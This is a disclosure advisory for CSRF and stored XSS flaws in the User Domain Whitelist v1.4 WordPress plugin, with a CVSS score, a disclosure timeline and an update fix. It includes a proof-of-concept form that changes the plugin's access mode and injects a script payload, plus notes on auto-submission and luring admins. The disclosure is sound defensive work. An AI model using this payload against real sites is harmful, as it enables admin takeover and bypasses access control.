Advisory:

XSS and CSRF in User Domain Whitelist v1.4

Vulnerability

Last revised:

Contains a CSRF vulnerability which would allow anybody to create a page which when visited by a logged-in admin user could set any options within the plugin (thus allowing the plugin’s access control to be circumvented).

Contains a stored XSS vulnerability which would allow anybody to create a page which when visited by a logged-in admin would give the attacker full access to do anything the admin user can do within the admin interface.

Current state: Fixed

CVSS Summary

CVSS base scores for this vulnerability
Score 5.8 Medium
Vector Network
Complexity Medium
Authentication None
Confidentiality Partial
Integrity Partial
Availability None
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

Here’s a simple form which switches the mode to blacklist which would allow anybody to register (assuming it was previously in whitelist mode). It also stores some XSS which will be displayed to the admin user, and will be displayed on subsequent visits to that page.

<form action="http://localhost/wp-admin/options-general.php?page=user-domain-whitelist.php" method="POST">
  <input type="text" name="update_HMUserDomainWhitelist" value="1">
  <input type="text" name="mode" value="black">
  <input type="text" name="domain_whitelist" value="&lt;/textarea>&lt;script>alert(1)&lt;/script>">
  <input type="submit">
</form>

Once the admin is cajoled into visiting a link of the attacker’s choosing (via spearphishing, perhaps) no further user interaction is required as the form can be submitted on page load with JavaScript.

Advisory timeline

  • Discovered: 2013-10-09
  • Reported to author: 2014-02-19
  • Reported as fixed by the author: 2014-02-22
  • Published: 2014-03-17

Mitigation/further actions

Update to version 1.5.